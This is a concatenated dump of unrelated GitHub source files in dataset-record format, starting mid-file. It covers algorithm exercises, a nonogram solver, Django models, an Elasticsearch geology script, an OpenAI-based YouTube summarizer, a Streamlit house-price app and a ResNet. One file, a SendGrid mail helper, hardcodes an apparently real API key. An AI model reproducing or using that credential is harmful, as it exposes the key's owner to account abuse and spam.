1\n # print('temp=', temp)\n for v,k in temp:\n heapq.heappush(pq, (v,k))\n # print(sorted(pq))\n\n l = [1]\n c = 1\n values = [0]\n ks = []\n\n\n multiples_of_primes = []\n\n def add_to_multiples_of_primes(start):\n for i in range(len(m)):\n multiples_of_primes.append((start*m[i], [t*start for t in template[i]]))\n\n ct = count(2)\n # print(pq)\n while c < n:\n if pq:\n v, k = heapq.heappop(pq)\n else:\n # print('here', multiples_of_primes)\n v, k = multiples_of_primes.pop(0)\n\n\n temp_v = v\n\n if not multiples_of_primes:\n add_to_multiples_of_primes(next(ct))\n\n while multiples_of_primes[0][0] < temp_v:\n sv, sk = multiples_of_primes.pop(0)\n # print('here', sv, si)\n # print(len(multiples_of_primes))\n if not multiples_of_primes:\n add_to_multiples_of_primes(next(ct))\n values.append(sv)\n ks.append(sk)\n item = reduce(mul, (p**i for p, i in zip(primes, sk) if i != 0))\n l.append(item)\n c += 1\n get_new_kv(l)\n temp_v = sv\n if c == n:\n # print('here')\n break\n # print('l=', l,c)\n values.append(v)\n ks.append(k)\n item = reduce(mul, (p**i for p, i in zip(primes, k) if i != 0))\n if item > l[-1]:\n l.append(item)\n c += 1\n get_new_kv(l)\n # print('l=', l)\n return l[-1]\n\n\n\n def nthSuperUglyNumber2(self, n: int, primes) -> int:\n\n\n debug = False\n # debug = True\n\n\n table = [[0]*len(primes) for _ in range(n)]\n \n table[0] = [1]*len(primes)\n\n def fill(r, c): \n val = primes[c] * l[r-1]\n max_col[c] = val, r, c\n return val\n\n # pprint(table)\n c = 1\n \n max_col = list(zip(primes, [0]*len(primes), range(len(primes))))\n # print(max_col)\n l = [1]\n \n\n\n pq = PriorityQueue()\n\n for i, v in enumerate(primes):\n pq.put((v, i))\n\n\n\n # pq.put((0, primes[0]))\n\n\n\n mx = primes[0]\n cr, cl = 0, 0\n\n\n\n\n\n\n\n while c < n:\n # current row, current col\n\n \n \n mx, cl = pq.get()\n cr = max_col[cl][1]\n\n if debug:\n # print('max_col=', max_col)\n print('cr=', cr, 'cl=', cl, 'mx=', mx)\n # print(' pk=', pk, 'pv=', pv)\n\n\n if cl == 0:\n\n # if primes[cl] * table[cr][cl] <= mx:\n if primes[cl] * table[cr][cl] == mx:\n if debug:\n print('cr=', cr, 'cl=', cl)\n print(primes[cl] * table[cr][cl], mx, primes[cl] * table[cr][cl] == mx)\n cr += 1\n table[cr][cl] = primes[cl] * table[cr-1][cl]\n max_col[cl] = table[cr][cl], cr, cl\n\n if table[cr][cl] > l[-1]:\n if debug:\n print(table[cr][cl], 'added to l')\n l.append(table[cr][cl])\n c += 1\n\n\n\n else:\n\n if cl < len(primes)-1:\n \n # if primes[cl] * l[cr] <= mx:\n if primes[cl] * l[cr] == mx:\n if debug:\n print('cr=', cr, 'cl=', cl)\n print(primes[cl] * l[cr], mx, primes[cl] * l[cr] == mx)\n\n cr += 1\n table[cr][cl] = fill(cr,cl)\n if table[cr][cl] > l[-1]:\n if debug:\n print(table[cr][cl], 'added to l')\n l.append(table[cr][cl])\n c += 1\n\n else:\n if debug:\n print('last column')\n\n cr += 1\n table[cr][cl] = fill(cr,cl)\n if table[cr][cl] > l[-1]:\n if debug: print(table[cr][cl], 'added to l')\n l.append(table[cr][cl])\n c += 1\n \n\n # if debug: pprint(table)\n\n if cl == 0:\n mx = max_col[cl][0] * primes[0]\n else:\n mx = primes[cl] * l[max_col[cl][1]]\n # print('mx=', mx, max_col[cl])\n\n pq.put((mx, cl))\n \n \n\n if debug:\n print(l,c)\n print(\"=\"*30)\n\n\n return l[-1]\n\n def nthSuperUglyNumber_final(self, n: int, primes) -> int:\n lp = len(primes)\n indices = [0]*lp\n l = [1]*n\n pq = list(zip(primes, range(lp)))\n heapq.heapify(pq)\n c, mx = 1, 1\n while c < n:\n val, i = heapq.heappop(pq)\n indices[i] += 1\n if val > mx:\n l[c] = val\n mx = val\n c += 1\n if i == 0:\n val *= primes[i]\n else:\n val = primes[i] * l[indices[i]]\n heapq.heappush(pq, (val, i))\n return l[-1]\n\ns = Solution()\n\n\nimport time\n\nstart = time.time()\n# print(\"hello\")\n\nn = 12\nprimes = [2,7,13,19]\nprint(s.nthSuperUglyNumber(n, primes)==32)\n\n\nn = 100000\n# n = 300\nprimes = [7,19,29,37,41,47,53,59,61,79,83,89,101,103,109,127,131,137,139,157,167,179,181,199,211,229,233,239,241,251]\na = s.nthSuperUglyNumber(n, primes)\nprint(a)\n# b = s.nthSuperUglyNumber2(n, primes)\n# print(a == 1092889481)\n# print(b)\n# print(a==b)\n\n\n\n\n\n\n# print()\nn = 35\nprimes = [2,3,11,13,17,23,29,31,37,47]\n# print(s.nthSuperUglyNumber(n, primes) == 62) # 62\n\n\n\nn = 4\nprimes = [2,3,5]\nprint(s.nthSuperUglyNumber(n, primes) == 4)\n\n\nn = 3\nprimes = [2]\nprint(s.nthSuperUglyNumber(n, primes) == 4)\n\n\n\nend = time.time()\nprint(end - start)\n\n\n\n\n\n\n\n\n\n\n\n \n","repo_name":"nickyfoto/lc","sub_path":"python/313.super-ugly-number.py","file_name":"313.super-ugly-number.py","file_ext":"py","file_size_in_byte":10136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24800562702","text":"import sys\ninput = sys.stdin.readline\n\n\nn = int(input())\nm = int(input())\na = list(map(int, input().split()))\nphoto = dict()\n\nfor i in range(m):\n\n if a[i] in photo:\n photo[a[i]][0] += 1\n else:\n if len(photo) == n:\n del photo[a[sorted(photo.values())[0][1]]]\n photo[a[i]] = [1, i]\n\nprint(' '.join(map(str, sorted(photo.keys()))))\n","repo_name":"JUNGJUNSEO/baekjun","sub_path":"백준/1713_후보 추천하기_220511.py","file_name":"1713_후보 추천하기_220511.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7778845259","text":"from functools import reduce, lru_cache\nfrom random import choice, shuffle, randrange, randint\nfrom collections import deque\nfrom queue import PriorityQueue\n#min of hamming distances between all 01 sentences with d-ones\n\nwith open(\"zad_input.txt\") as f:\n inp = [[int(c) for c in row.split(\" \") if c] for row in f.read().split(\"\\n\") if row]\n [K,M] = inp[0]\n rows = inp[1:K+1]\n columns = inp[-M:]\n\ndef transpose(matrix):\n return [[matrix[a][b] for a in range(len(matrix))] for b in range(len(matrix[0]))]\n\ndef generate_all(n,a):\n if n <= 0:\n if not a:\n return [[]]\n else:\n return []\n if not a:\n return [[0]*n]\n [a1, *at] = a\n return [[0]*i + [1]*a1 + ([0] if at else []) + other for i in range(0, n) for other in generate_all(n-a1-i-(1 if at else 0), at) if len([0]*i + [1]*a1 + ([0] if at else []) + other) == n]\n\ndef solve(row_values, column_values):\n\n def allowable(row):\n def _and_pixel(x,y):\n return x if x == y else 2\n return reduce(lambda a, b: [_and_pixel(x,y) for x, y in zip(a, b)], row)\n\n def show(m):\n return \"\\n\".join(\"\".join(\".#?\"[i] for i in x) for x in m)\n\n w, h = len(column_values), len(row_values)\n rows = [generate_all(w, x) for x in row_values]\n cols = [generate_all(h, x) for x in column_values]\n can_do = [allowable(row) for row in rows]\n\n def _can_fit(x,y):\n return x == y or x == 2 or y == 2\n\n def fits(a, b):\n return all(_can_fit(x,y) for x, y in zip(a, b))\n\n def fix_col(n):\n c = [x[n] for x in can_do]\n cols[n] = [x for x in cols[n] if fits(x, c)]\n for i, x in enumerate(allowable(cols[n])):\n if x != can_do[i][n]:\n fillable_rows.add(i)\n can_do[i][n] = x if _can_fit(x, can_do[i][n]) else 2\n\n def fix_row(n):\n c = can_do[n]\n rows[n] = [x for x in rows[n] if fits(x, c)]\n for i, x in enumerate(allowable(rows[n])):\n if x != can_do[n][i]:\n fillable_cols.add(i)\n can_do[n][i] = x if _can_fit(x, can_do[n][i]) else 2\n\n fillable_rows, fillable_cols = set(), set(range(w))\n\n while fillable_cols:\n for i in fillable_cols:\n fix_col(i)\n fillable_cols = set()\n for i in fillable_rows:\n fix_row(i)\n fillable_rows = set()\n\n return show(can_do)\n\n\ndef print_board(board):\n return \"\\n\".join([\"\".join(map(str,row)) for row in board])\n\nwith open(\"zad_output.txt\", mode='w') as f:\n f.write(solve(rows,columns))\n","repo_name":"wekt0r/uni","sub_path":"Sztuczna Inteligencja/p3/z1.py","file_name":"z1.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"9372425379","text":"import requests\n\nAPI_KEY = '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'\n\ndef send(destination, subject, message):\n\n post = requests.post(\n \"https://api.sendgrid.com/v3/mail/send\",\n headers={\n \"Authorization\": \"Bearer \" + API_KEY,\n \"Content-Type\": \"application/json\"\n },\n json = {\n \"personalizations\": [ {\n \"to\": [ { \"email\": destination } ],\n \"subject\": subject\n } ],\n\n \"from\": {\n \"email\": \"rotafestival@gmail.com\",\n \"name\": \"ROTA - Festival de Roteiro Audiovisual\"\n },\n\n \"content\": [ {\n \"type\": \"text/html\",\n \"value\": message\n } ]\n }\n\n )\n\n","repo_name":"1um0zero/rota","sub_path":"src/core/sendgrid.py","file_name":"sendgrid.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20855462593","text":"from django.db import models\nfrom users.models import BaseUser\n\n# Create your models here.\n\n\n\nclass Message(models.Model):\n \"\"\" Class that is the framework for all messages that get registered into the database\n\n \"\"\"\n\n from_user = models.ForeignKey(BaseUser, null=True, related_name='creator')\n to_user = models.ForeignKey(BaseUser, null=True, related_name='receiver')\n subject_line = models.CharField(('Subject'), max_length=140, blank=True,)\n\n is_read = models.BooleanField(('Read'), default=False)\n\n body_text = models.CharField(('Body'), max_length=1000, blank=True,)\n\n def setAsRead(self):\n \"\"\" Flips the is_read boolean to determine if the message has been seen/read yet\n\n :return: n/a\n \"\"\"\n self.is_read = True","repo_name":"Gr34v0/DogeIncToolShare","sub_path":"messaging/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"69999824009","text":"import os\nimport pandas as pd\nfrom shapely.geometry import Point, Polygon\nfrom elasticsearch_config import es\nfrom elasticsearch.helpers import bulk\nfrom multiprocessing import Process, Manager\nimport time\n\nstart_time = time.time()\n\n# ---------- CREAR INDEX OG FIELD PRICES ----------\n\nog_mapp = es.indices.get_mapping(index=\"wells_coordinates_texas\")[\n \"wells_coordinates_texas\"\n]\n\nog_mapp[\"mappings\"][\"properties\"][\"geology_type\"] = {\n \"type\": \"text\",\n \"fields\": {\"keyword\": {\"type\": \"keyword\", \"ignore_above\": 256}},\n}\n\n\nes.indices.create(index=\"well_geology\", body=og_mapp, ignore=400)\n\n# ---------- IDENTIFICAR TIPO DE GEOLOGIA ----------\n\ngeology_index = \"tx_geol_poly\"\nwell = \"wells_coordinates_texas\"\nquery = {\"query\": {\"match_all\": {}}}\nindex_geology_hits = []\nwell_hits = []\n\n\ndef get_batch_data(index, data):\n res = es.search(index=index, body=query, size=10000, scroll=\"2m\")\n scroll_id = res[\"_scroll_id\"]\n hits = res[\"hits\"][\"hits\"]\n data.extend(hit[\"_source\"] for hit in hits)\n\n while len(hits) > 0:\n res = es.scroll(scroll_id=scroll_id, scroll=\"2m\")\n scroll_id = res[\"_scroll_id\"]\n hits = res[\"hits\"][\"hits\"]\n data.extend(hit[\"_source\"] for hit in hits)\n\n\ndef process_geology_hits():\n get_batch_data(geology_index, index_geology_hits)\n polygons = []\n\n for hit in index_geology_hits:\n coordinates = hit[\"geometry\"][\"coordinates\"][0]\n polygons.append(Polygon(coordinates))\n\n return polygons\n\n\ndef process_well_hit(well_hit, polygons, index_geology_hits, result):\n well_location = Point(*well_hit[\"geometry\"])\n for i, polygon in enumerate(polygons):\n if well_location.within(polygon):\n well_hit[\"geology_type\"] = index_geology_hits[i][\"GENERALIZE\"]\n result.append(well_hit)\n\n\ndef process_well_hits(well_hits, polygons, index_geology_hits, result):\n for well_hit in well_hits:\n process_well_hit(well_hit, polygons, index_geology_hits, result)\n\n\nif __name__ == \"__main__\":\n manager = Manager()\n result = manager.list()\n\n get_batch_data(well, well_hits)\n polygons = process_geology_hits()\n\n chunk_size = max(len(well_hits) // 10, 1)\n processes = []\n\n for i in range(0, len(well_hits), chunk_size):\n process = Process(\n target=process_well_hits,\n args=(well_hits[i : i + chunk_size], polygons, index_geology_hits, result),\n )\n processes.append(process)\n process.start()\n\n for process in processes:\n process.join()\n\n def ingestion_bulk(index_name, batch_size=5000):\n data = [{\"_index\": index_name, \"_source\": doc} for doc in result]\n len_data = len(data)\n\n for i in range(0, len_data, batch_size):\n success, failed = bulk(es, data[i : i + batch_size])\n\n if failed:\n print(f\"Error al indexar {failed} documentos.\")\n else:\n print(f\"Se indexaron los documentos correctamente.\")\n\n ingestion_bulk(\"well_geology\")\n\n end_time = time.time()\n all_time = end_time - start_time\n\n print(f\"Tiempo de procesamiento: {float(all_time) / 60} minutos.\")\n","repo_name":"CristianERP/elastic","sub_path":"well_geology_parallel.py","file_name":"well_geology_parallel.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1620154821","text":"import openai\nimport pandas as pd\nfrom pytube import YouTube\nfrom transformers import T5Tokenizer\nfrom transformers import T5Tokenizer, T5ForConditionalGeneration\nfrom transformers import GPT2TokenizerFast\nfrom transformers import pipeline\nimport textwrap\nfrom concurrent.futures import ThreadPoolExecutor\nimport logging\nimport warnings\nimport yt_dlp\nimport os\n# Supress warnings\nlogging.basicConfig(level=logging.CRITICAL)\nwarnings.filterwarnings(\"ignore\")\n\n# OpenAI API key\nopenai.api_key = \"Your OpenAI API Key\"\n\ndef get_transcript(youtubelink):\n video_url = youtubelink\n\n # Create a yt-dlp instance\n ydl_opts = {\n 'format': 'bestaudio/best',\n 'extractaudio': True,\n 'audioformat': 'mp3',\n 'outtmpl': 'audio_file.mp3',\n 'noplaylist': True,\n }\n with yt_dlp.YoutubeDL(ydl_opts) as ydl:\n # Extract video information\n video_info = ydl.extract_info(video_url, download=False)\n # Download the audio\n ydl.download([video_url])\n\n audio_file = \"audio_file.mp3\"\n\n \n\n with open(audio_file, \"rb\") as audio:\n transcript = openai.Audio.translate(\"whisper-1\", audio)\n\n thetext = transcript['text']\n\n with open(\"full_transcript.txt\", \"w\") as file:\n file.write(thetext)\n\n # Remove the audio file after processing\n os.remove(audio_file)\n\n return thetext\n\n\n\ndef count_tokens(input_data, max_tokens=20000, input_type='text'):\n tokenizer = GPT2TokenizerFast.from_pretrained(\"gpt2\")\n \n if input_type == 'text':\n tokens = tokenizer.tokenize(input_data)\n elif input_type == 'tokens':\n tokens = input_data\n else:\n raise ValueError(\"Invalid input_type. Must be 'text' or 'tokens'\")\n\n # Print the number of tokens\n token_count = len(tokens)\n return token_count\n\n\n\ndef truncate_text_by_tokens(text, max_tokens=3000):\n tokenizer = GPT2TokenizerFast.from_pretrained(\"gpt2\")\n \n # Tokenize the input text\n tokens = tokenizer.tokenize(text)\n\n # Truncate tokens to final_max_tokens\n truncated_tokens = tokens[:max_tokens]\n\n trunc_token_len = count_tokens(truncated_tokens, input_type='tokens')\n\n print(\"Truncated Summary Token Length:\"+ str(trunc_token_len))\n\n # Convert the truncated tokens back to text\n truncated_text = tokenizer.convert_tokens_to_string(truncated_tokens)\n\n return truncated_text\n\n\n\ndef summarize_chunk(classifier, chunk):\n summary = classifier(chunk)\n return summary[0][\"summary_text\"]\n\n\n\ndef summarize_text(text, model_name=\"t5-small\", max_workers=8):\n classifier = pipeline(\"summarization\", model=model_name)\n summarized_text = \"\"\n\n # Split the input text into smaller chunks\n chunks = textwrap.wrap(text, width=500, break_long_words=False)\n\n # Parallelize the summarization of the chunks\n with ThreadPoolExecutor(max_workers=max_workers) as executor:\n summaries = executor.map(lambda chunk: summarize_chunk(classifier, chunk), chunks)\n summarized_text = \" \".join(summaries)\n text_len_in_tokens = count_tokens(text)\n print(\"Tokens in full transcript\" + str(text_len_in_tokens))\n summary_token_len = count_tokens(summarized_text)\n print(\"Summary Token Length:\"+ str(summary_token_len))\n\n if summary_token_len > 2500:\n summarized_text = truncate_text_by_tokens(summarized_text, max_tokens=2500)\n\n else:\n summarized_text = summarized_text\n\n\n with open(\"transcript_summary.txt\", \"w\") as file:\n file.write(summarized_text)\n\n\n print(\"summarized by t5\")\n return summarized_text.strip()\n\n\n\ndef gpt_summarize_transcript(transcript_text,token_len):\n # Check the length of the transcript\n \n # Generate the summary using the OpenAI ChatCompletion API\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": \"You are an expert at summarizing long documents into concise and comprehensive summaries. Your summaries often capture the essence of the original text.\"},\n {\"role\": \"user\", \"content\": \"I have a long transcript that I would like you to summarize for me. Please think carefully and do the best job you possibly can.\"},\n {\"role\": \"system\", \"content\": \"Absolutely, I will provide a concise and comprehensive summary of the transcript.\"},\n {\"role\": \"user\", \"content\": \"Excellent, here is the transcript: \" + transcript_text}\n ],\n max_tokens=3800 - token_len,\n n=1,\n stop=None,\n temperature=0.5,\n )\n\n # Extract the generated summary from the response\n summary = response['choices'][0]['message']['content']\n print(\"summarized by GPT3\")\n\n with open(\"transcript_summary.txt\", \"w\") as file:\n file.write(summary)\n\n\n # Return the summary\n return summary.strip()\n \n\n\ndef generate_tweet_thread(transcript_text):\n # Generate the tweets using the OpenAI ChatCompletion API\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": \"You are an expert at writing tweet threads that are incredibly interesting and potentially newsworthy. You are known to go viral.\"},\n {\"role\": \"user\", \"content\": \"I have text that I would like you to use as the basis for coming up with multiple tweets for a long-form twitter thread. Please think step by step and do the best job you possibly can. Each tweet should be on a new line\"},\n {\"role\": \"system\", \"content\": \"Absolutely, I will provide a list of tweets on new lines for easy parsing. This tweet thread should be written to go viral. I will make sure each tweet is less than 250 characters.\"},\n {\"role\": \"user\", \"content\": \"Excellent, here is the transcript: \" + transcript_text},\n {\"role\": \"system\", \"content\": \"My list will be formatted as: Tweet 1 \\n\\n Tweet 2 \\n\\n Tweet 3 \\n\\n etc.\"}\n\n ],\n max_tokens=900,\n n=1,\n stop=None,\n temperature=0.5,\n )\n\n # Extract the generated tweets from the response\n tweets = response['choices'][0]['message']['content']\n print(tweets)\n\n # Split the tweets into separate parts\n tweets = tweets.split(\"\\n\\n\")\n print(tweets)\n\n # Create a dataframe from the tweets\n df = pd.DataFrame({\"tweet\": tweets})\n df.to_csv('Tweet_Thread.csv')\n\n # Return the tweets as a list\n return tweets\n\n\n\ndef generate_long_form_article(transcript_text,token_len):\n # Generate the article outline using the OpenAI ChatCompletion API\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": \"You are an expert at writing long-form article outlines that are informative, engaging, and well-researched. Your articles often go viral and are widely shared.\"},\n {\"role\": \"user\", \"content\": \"I have some text that I would like you to use as the basis for a long-form article outline. Please think carefully and do the best job you can to come up with an outline for the article.\"},\n {\"role\": \"system\", \"content\": \"Absolutely, I will provide a comprehensive and well-structured outline for the article based on the content. I will provide the result numbered with roman numerals \"},\n {\"role\": \"user\", \"content\": \"Excellent, here is the transcript: \" + transcript_text},\n {\"role\": \"system\", \"content\": \"Here are the sections without any start text, numbered by roman numerals\"}\n\n ],\n max_tokens=3700 - token_len,\n n=1,\n stop=None,\n temperature=0.5,\n )\n\n # Extract the article outline from the response\n outline = response['choices'][0]['message']['content']\n outline_token_count = count_tokens(outline)\n sections = outline.strip().split(\"\\n\\n\")\n parsed_data = []\n for section in sections:\n lines = section.strip().split(\"\\n\")\n section_title = lines[0].strip()\n section_items = [item.strip() for item in lines[1:]]\n parsed_data.append([section_title, section_items])\n \n with open(\"article_outline.txt\", \"w\") as file:\n file.write(str(parsed_data))\n\n\n\n generated_sections = []\n # Loop through each section in the outline\n for section in parsed_data:\n # Generate the section using the OpenAI ChatCompletion API\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": \"You are an expert at writing long-form articles that are informative, engaging, and well-researched. Your articles often go viral and are widely shared. You will be given an article outline for context, and instructions on which section of the outline to complete.\"},\n {\"role\": \"user\", \"content\": \"I have a section of an article that I would like you to write for me. Please think carefully and do the best job you can to come up with a well-written and comprehensive section. Please also take into consideration the article's outline so that you can write without overlapping pevious points and build on each section.\"},\n {\"role\": \"system\", \"content\": \"Absolutely, I will provide a comprehensive and well-written section based taking into consideration the outline. I will provide only the section text without any additional text\"},\n {\"role\": \"user\", \"content\": \"Excellent, here is the outline to use to understand your goal better: \" + outline + \" and the section to write: \" + str(section)}\n ],\n max_tokens=3700-outline_token_count,\n n=1,\n stop=None,\n temperature=0.2,\n )\n\n # Extract the generated section from the response\n generated_section = response['choices'][0]['message']['content']\n\n\n # Add the generated section to the list of generated sections\n generated_sections.append(generated_section)\n\n # Combine the generated sections into a finished article\n article = \"\\n\\n\".join(generated_sections)\n\n # Save the article to a text file\n with open(\"long_form_article.txt\", \"w\") as file:\n file.write(article)\n\n # Return the article\n return article\n\n\n\n# Get the transcript from the video\ntranscription = get_transcript(\"Your Youtube Video URL\")\n\n# Get the token length of the transcript\ntoken_count = count_tokens(transcription)\nprint(token_count)\n\n\n\n# Summarize with either GPT3 or T5 depending on length of transcript:\nif token_count > 3000:\n summarized_text = summarize_text(transcription)\n new_token_count = count_tokens(summarized_text)\nelse:\n summarized_text = gpt_summarize_transcript(transcription,token_count)\n new_token_count = count_tokens(summarized_text) \n\n\n\n# Generate the tweet thread using the summary\ntweets = generate_tweet_thread(summarized_text)\n\n\n\n# Generate the long-form article using the summary\narticle = generate_long_form_article(summarized_text,new_token_count)\n\n\n\n\n","repo_name":"Phishman81/audio-transcript","sub_path":"backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":10979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41219809003","text":"from django.db import models\nfrom Users.models import Users\nclass Shopcart(models.Model):\n id = models.AutoField(primary_key=True)\n #购买商品\n goods = models.CharField(max_length=20)\n #购买数量\n count = models.IntegerField()\n #添加时间\n add_time = models.TimeField()\n #小记金额\n subtotal = models.IntegerField()\n #所属用户\n users = models.ForeignKey(Users)\n\n\n# Create your models here.\n","repo_name":"wzk1997/commerce","sub_path":"shopcart/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3052913378","text":"import streamlit as st\nimport pandas as pd\nimport streamlit.components.v1 as components\nimport time\nimport numpy as np\nimport pickle\nimport json\nfrom sklearn.ensemble import RandomForestRegressor\nimport altair as alt\n\nwith open('locations.json','r') as f:\n location = json.load(f)\n\n\n\nwith open('mysore_home_prices_model.pickle', 'rb') as f:\n model = pickle.load(f)\n\nwith open(\"columns.json\", \"r\") as f:\n data_columns = json.load(f)['data_columns']\n \n\ndef predict_price(location,ppsqft,area,beds): \n loc_index = data_columns.index(location)\n beds_index = data_columns.index(beds)\n \n x = np.zeros(len(data_columns))\n #x[0] = beds\n x[0] = area\n x[1] = ppsqft\n \n if loc_index >= 0:\n x[loc_index] = 1\n if beds_index >= 0:\n x[beds_index] = 1\n\n return model.predict([x])[0]\n\n@st.cache\ndef load_data():\n data = pd.read_csv('combined_cleaned.csv')\n return data\n\ndata_load_state = st.text('Loading data...')\ndata = load_data()\ndata_load_state.text(\"\")\nlocation_list = list(location.keys())\nlocation_list.append('None')\n\n\n## Sidebar code\ncities_filter = st.sidebar.multiselect('Select 2 more locaitons for price comparision', location_list)\nif cities_filter:\n loc_select = st.sidebar.selectbox(\"Select the location\",location_list,index=location_list.index(cities_filter[0]))\nelse:\n loc_select = st.sidebar.selectbox(\"Select the location\",location_list,index=location_list.index('None'))\nbeds_select = st.sidebar.slider('Number of Beds', 1,8) \n\n\n# main page code\nst.markdown(\"\"\"

    House Price Prediction - Mysore

    \"\"\",unsafe_allow_html=True)\n\n\nif loc_select != 'None':\n predicted_price = round(predict_price(loc_select,location[loc_select],(500*beds_select)+500,beds_select),2)\n if predicted_price >= 100:\n st.markdown(f\"\"\" Approximate price of house in `{loc_select}` with `{beds_select}` beds is \"\"\",unsafe_allow_html=True)\n st.markdown(f\"\"\"

    ₹{round(predicted_price/100,2)} Crores

    \"\"\",unsafe_allow_html=True)\n else:\n st.markdown(f\"\"\" Approximate price of house in `{loc_select}` with `{beds_select}` beds is \"\"\",unsafe_allow_html=True)\n st.markdown(f\"\"\"

    ₹{predicted_price} Lakhs

    \"\"\",unsafe_allow_html=True)\n\n\n\n\nchart = alt.Chart(data).mark_bar().encode(\n x='Location',\n y=('average(Price)')\n)\n\n#st.altair_chart(chart)\n\n\nimport matplotlib.pyplot as plt\nplt.style.use('dark_background')\nimport seaborn as sns\n\n\ndef avg_price(location):\n price_list=[]\n no_price_list = []\n location_list = []\n avg_loc_bed = data.groupby(['Location','Beds'])['Price'].mean()\n \n for x in location:\n try:\n price_list.append(avg_loc_bed[x][int(beds_select)])\n location_list.append(x)\n except KeyError:\n no_price_list.append(x)\n\n if len(no_price_list) >= 1:\n st.warning(f'Unfortunately, there are no data avaialbe for {beds_select} beds in {no_price_list} locations ')\n return price_list,location_list\n\nfig, ax = plt.subplots()\nif len(avg_price(cities_filter)[1]) > 1:\n ax.bar(avg_price(cities_filter)[1],avg_price(cities_filter)[0],color = ['#f63366','c'])\n plt.title('Average price comparision for selected locations')\n plt.ylabel('Price in Lakhs')\n plt.xticks(rotation=45)\n plt.xlabel('Location Names')\n st.pyplot(fig)","repo_name":"karthikmprakash/Mysore-Real-Estate-Analysis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"40082987913","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nimport random\nfrom torch.nn.utils.weight_norm import WeightNorm\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"\"\"3x3 convolution with padding\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n\ndef conv1x1(in_planes, out_planes, stride=1):\n \"\"\"1x1 convolution\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)\n\ndef mixup_data(x, y, lam):\n\n '''Compute the mixup data. Return mixed inputs, pairs of targets, and lambda'''\n \n batch_size = x.size()[0]\n index = torch.randperm(batch_size)\n if torch.cuda.is_available():\n index = index.cuda()\n mixed_x = lam * x + (1 - lam) * x[index,:]\n y_a, y_b = y, y[index]\n\n return mixed_x, y_a, y_b, lam\n\nclass distLinear(nn.Module):\n def __init__(self, indim, outdim):\n super(distLinear, self).__init__()\n self.L = nn.Linear( indim, outdim, bias = False)\n self.class_wise_learnable_norm = True #See the issue#4&8 in the github \n if self.class_wise_learnable_norm: \n WeightNorm.apply(self.L, 'weight', dim=0) #split the weight update component to direction and norm \n\n if outdim <=200:\n self.scale_factor = 2; #a fixed scale factor to scale the output of cos value into a reasonably large input for softmax\n else:\n self.scale_factor = 10; #in omniglot, a larger scale factor is required to handle >1000 output classes.\n\n def forward(self, x):\n x_norm = torch.norm(x, p=2, dim =1).unsqueeze(1).expand_as(x)\n x_normalized = x.div(x_norm+ 0.00001)\n if not self.class_wise_learnable_norm:\n L_norm = torch.norm(self.L.weight.data, p=2, dim =1).unsqueeze(1).expand_as(self.L.weight.data)\n self.L.weight.data = self.L.weight.data.div(L_norm + 0.00001)\n cos_dist = self.L(x_normalized) #matrix product by forward function, but when using WeightNorm, this also multiply the cosine distance by a class-wise learnable norm, see the issue#4&8 in the github\n scores = self.scale_factor* (cos_dist) \n\n return scores\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(BasicBlock, self).__init__()\n self.conv1 = conv3x3(inplanes, planes, stride)\n self.bn1 = nn.BatchNorm2d(planes)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = conv3x3(planes, planes)\n self.bn2 = nn.BatchNorm2d(planes)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n identity = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity\n out = self.relu(out)\n\n return out\n\nclass ResNet(nn.Module):\n\n def __init__(self, block, layers, num_classes=200, zero_init_residual=False):\n super(ResNet, self).__init__()\n self.inplanes = 64\n self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1,\n bias=False)\n self.bn1 = nn.BatchNorm2d(64)\n self.relu = nn.ReLU(inplace=True)\n self.layer1 = self._make_layer(block, 64, layers[0])\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2)\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2)\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2)\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n \n self.fc = distLinear(512 * block.expansion, num_classes)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 